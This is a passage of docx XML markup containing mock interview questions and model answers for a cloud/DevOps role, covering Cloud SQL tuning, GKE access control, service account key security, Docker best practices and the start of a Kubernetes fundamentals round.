        <w:t>A: Add fairness/bias evaluation across relevant demographic slices of the evaluation data before approval, not just aggregate accuracy, and require explainability tooling (SHAP/LIME or a model-native explanation method) for high-stakes decisions so predictions can be justified to affected users or auditors. Ensure full lineage - what data, code, and process produced this model version - is captured and reviewable, and establish a responsible AI review gate as a required step in the promotion pipeline, not an optional afterthought.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud SQL performance: A Cloud SQL database has high CPU and lock contention. How would you debug queries, connections, pooling, indexes, replicas, and app rollout impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Cloud SQL's Query Insights to identify the slowest and most frequent queries, and check for lock contention specifically around transactions holding locks longer than necessary (often from a missing index causing a full table scan within a transaction). Verify the application's connection pool is sized appropriately (too many connections can itself cause CPU overhead from context switching), consider read replicas to offload read traffic from the primary, and correlate the CPU spike timing with any recent application deployment that might have introduced an inefficient query pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Platform engineering: What self-service golden paths would you build for product teams, and what guardrails would you enforce without slowing delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build golden paths for the highest-frequency needs first - new service scaffolding with CI/CD and observability pre-wired, standardized infrastructure provisioning (database, cache, storage) through a self-service API, and a well-documented deployment/rollback pattern. Enforce guardrails that matter most (security baseline, resource limits, required observability) as defaults baked into the golden path rather than manual gates, so following the easy path automatically means following the safe path, and delivery speed and safety aren't in tension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 13 - Recently Asked GCP Access and Security Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Compute Engine SSH troubleshooting: You are not able to SSH into a Compute Engine instance. What could be the reasons, and how would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common causes are a missing or misconfigured firewall rule allowing SSH (port 22) from your source IP, the instance lacking a public IP (or you not using IAP tunneling for private instances), an SSH key mismatch (metadata key not propagated or wrong key used), or the instance itself being unhealthy (boot disk full, OS-level SSH daemon not running). Troubleshoot by checking firewall rules and the instance's serial console output for boot/SSH daemon errors, verifying the SSH key in project/instance metadata matches what you're using, and confirming network connectivity (VPC routes, Private Google Access if using IAP) is correctly configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Compute Engine SSH access: What do we get when we SSH into a Compute Engine instance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: You get a standard Linux (or Windows via RDP) shell session on the VM with the permissions of the OS-level user account associated with your SSH key or IAM-based OS Login identity, giving you the same kind of access you'd have on any Linux server - the ability to run commands, inspect processes, view logs, and manage the instance's local filesystem and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. GKE Workload Identity: You have workloads running on GKE. How would you give only one pod access to Cloud Storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a dedicated Kubernetes ServiceAccount used only by that specific pod's deployment, bind it via Workload Identity to a GCP service account granted only the specific Cloud Storage IAM role needed (e.g. objectViewer on a specific bucket, not project-wide Storage access), and ensure no other pods reference that Kubernetes ServiceAccount. This way only the intended pod inherits the GCP permissions, while other pods in the cluster using the default or their own service accounts have no access to that bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Service account key security: You know about service account JSON keys. Even if someone has the JSON key, how can you prevent them from creating or accessing resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The most effective prevention is not having long-lived JSON keys at all - use Workload Identity or Workload Identity Federation so there's no static key to steal in the first place. If keys must exist, minimize the blast radius by granting the service account only narrowly-scoped, least-privilege IAM roles, set key expiration and rotate regularly, use VPC Service Controls to restrict what the key can access even with valid credentials, and monitor audit logs for anomalous usage patterns (unusual location, unusual API calls) that would indicate a stolen key being used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GKE image verification: In GKE, anyone can deploy a Docker image. How would you ensure that only verified and signed images are deployed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable Binary Authorization on the cluster with a policy requiring every image to carry a valid attestation from your trusted CI/CD pipeline before it's allowed to run, so even someone with cluster deploy permissions can't run an arbitrary unverified image - the admission controller blocks it. Sign images with cosign as part of the CI build process, and configure the Binary Authorization policy to check that signature/attestation chain automatically at deploy time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Hybrid connectivity: How do you connect an on-premises network to a GCP network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The main options are Cloud VPN (IPsec tunnels over the public internet, simplest to set up but with internet-dependent latency/bandwidth), Dedicated Interconnect (a direct physical connection to Google's network for high bandwidth and low latency), and Partner Interconnect (connecting through a supported service provider when a direct physical connection isn't practical). Choose based on required bandwidth, latency sensitivity, and budget - VPN for lower-traffic or quick setup, Interconnect for production-grade, high-bandwidth hybrid connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. GCP security baseline: What additional security measures would you implement for the GCP environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Beyond basic IAM hygiene, implement org policies restricting public IPs and enforcing OS Login, enable VPC Service Controls for sensitive data perimeters, turn on Security Command Center for continuous posture monitoring, enforce Binary Authorization for container deployments, and ensure audit logging is enabled and retained for all projects. Layer in Cloud Armor for internet-facing services and regular access reviews using IAM Recommender to catch permission creep before it becomes a real exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Cloud Logging analysis: You have logs in Cloud Logging. How would you analyze them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Cloud Logging's query language (Logging Query Language) to filter by severity, resource type, and specific fields, and build log-based metrics for patterns you want to track over time (error rate by service, specific exception types). For deeper analysis, export logs to BigQuery and run SQL queries for aggregation and trend analysis that the Logging UI doesn't support well, or route them to a sink feeding a dedicated analysis tool if the team needs more advanced search/visualization than Cloud Logging natively provides.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 14 - Recently Asked Operations and Docker Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Log automation: Can you automate log analysis or processing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Yes - use log-based metrics and alerting policies in Cloud Monitoring to automatically detect and page on error patterns without manual review, and use scheduled queries or Dataflow/Cloud Functions triggered by log sinks to automatically parse, aggregate, and summarize logs (e.g. a daily top-errors report). For incident response specifically, automation can pre-fetch relevant recent logs and surface a summary the moment an alert fires, saving the responder from manually querying logs as a first step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Cloud Functions and Cloud Run: Have you used Cloud Functions or Cloud Run? Explain use cases and operational considerations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Functions fits small, single-purpose, event-triggered code (a Pub/Sub message triggering a lightweight transformation) where you want minimal operational overhead and don't need control over the runtime environment. Cloud Run fits containerized services needing more control (custom dependencies, longer-running requests, multiple endpoints) while still being fully managed and serverless. Operational considerations for both include cold-start latency for infrequent invocations, concurrency/scaling limits, and ensuring IAM permissions are scoped narrowly per function/service rather than broadly shared.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Datadog: Have you used Datadog, and how would you use it for metrics, logs, traces, dashboards, and alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Datadog unifies metrics, logs, and traces in one platform with agent-based or API-based ingestion, which is valuable for correlating a spike in latency (metrics) with the specific traces and log lines that explain it, without switching tools. Build dashboards scoped per audience (service-level golden signals for app teams, fleet-wide health for platform teams), and configure monitors/alerts based on anomaly detection or static thresholds tied to SLOs, routing to the correct on-call team via integrations with PagerDuty or similar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Cloud Functions latency: A newly created Cloud Function had high latency for a few minutes and then automatically recovered. What could be the reason?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: This is a classic cold-start pattern - a newly deployed or recently-scaled-to-zero function needs to provision a new execution environment (download code, initialize the runtime, run any global initialization code) on the first few invocations, which adds significant latency until enough warm instances exist to handle the traffic without cold starts. Setting a minimum number of instances (if using Cloud Functions 2nd gen, which runs on Cloud Run) keeps instances warm and avoids this pattern for latency-sensitive functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GCP cost optimization: How would you reduce the cost of a GCP environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with the biggest levers: rightsizing over-provisioned Compute Engine/GKE resources based on actual utilization data, purchasing committed use discounts for stable baseline workloads, and cleaning up unused resources (idle disks, unattached IPs, forgotten test projects). Reduce storage costs with lifecycle policies moving old data to cheaper tiers, minimize cross-region/cross-zone egress traffic where architecturally avoidable, and use spot/preemptible instances for fault-tolerant batch workloads - all backed by billing export analysis to find where the actual spend concentrates rather than guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Docker experience: Have you worked on Docker? Explain the workflows and production concerns you handled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Production Docker workflows typically involve writing multi-stage Dockerfiles for small, secure images, integrating vulnerability scanning and image signing into the CI pipeline, and pushing versioned images to a registry consumed by Kubernetes deployments. Production concerns include ensuring images run as non-root, resource limits are set correctly at the orchestration layer, base images are kept patched and current, and build reproducibility is maintained through pinned dependencies and digests rather than floating tags.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Dockerfiles: Have you written Dockerfiles? What best practices do you follow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Best practices include using multi-stage builds to keep the final image small, ordering instructions so rarely-changing layers (dependency installs) come before frequently-changing ones (application code) to maximize build cache efficiency, running as a non-root user, and pinning base image versions to a digest for reproducibility. Also avoid installing unnecessary packages, clean up package manager caches within the same layer they were created to avoid bloating image size, and never bake secrets into the image or its build history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Docker build context: What is Docker build context, and why does it matter for build speed, security, and image contents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The build context is the set of files sent to the Docker daemon when you run `docker build`, typically the entire directory containing the Dockerfile unless scoped with a .dockerignore file - everything in that context is available to COPY/ADD instructions but also gets uploaded to the daemon even if unused, slowing builds. It matters for security because an overly broad context can accidentally include secrets, credentials, or .git history that end up copied into an image layer; using a tight .dockerignore is the standard mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 15 - Docker Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Docker fundamentals: What is Docker, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Docker packages an application with all its dependencies into a lightweight, portable container image, solving the classic 'it works on my machine' problem by ensuring the same environment runs identically from a developer's laptop through CI to production, without needing a full VM per application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Dockerfile fundamentals: What is a Dockerfile, and how is it used to build an image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Dockerfile is a text file of instructions (FROM, COPY, RUN, CMD, etc.) describing how to assemble a container image layer by layer - `docker build` reads it top to bottom, executing each instruction to produce a final image that can be tagged, pushed to a registry, and run consistently anywhere Docker is installed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Docker CMD vs ENTRYPOINT: What is the difference between CMD and ENTRYPOINT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ENTRYPOINT defines the fixed executable that always runs when the container starts, while CMD provides default arguments to that entrypoint (or the default command if no ENTRYPOINT is set) that can be overridden at `docker run` time - combining both lets you build an image with a fixed main command but configurable default arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Docker image optimization: How do you optimize Docker image size?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a minimal base image (Alpine or distroless), multi-stage builds so build tools never reach the final image, combine RUN instructions and clean up package manager caches within the same layer, and copy only the files actually needed rather than the whole build context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Docker multi-stage builds: What are multi-stage builds, and when would you use them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-stage builds use multiple FROM statements in one Dockerfile, where an early stage compiles or builds the application with full toolchains, and a later, minimal stage copies only the compiled artifact - use them any time your build process needs tools (compilers, dependency managers) that shouldn't bloat or expose attack surface in the final runtime image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Docker image security: How do you secure Docker images before deploying them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan images for known vulnerabilities in CI before push, run as a non-root user, use a minimal base image to reduce attack surface, never bake secrets into layers, sign images and enforce verification (Binary Authorization) at deploy time, and keep base images patched and rebuilt regularly rather than treating an image as build-once-run-forever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 16 - Kubernetes and GKE Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Kubernetes architecture: Explain the architecture of Kubernetes, including control plane and worker-node components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
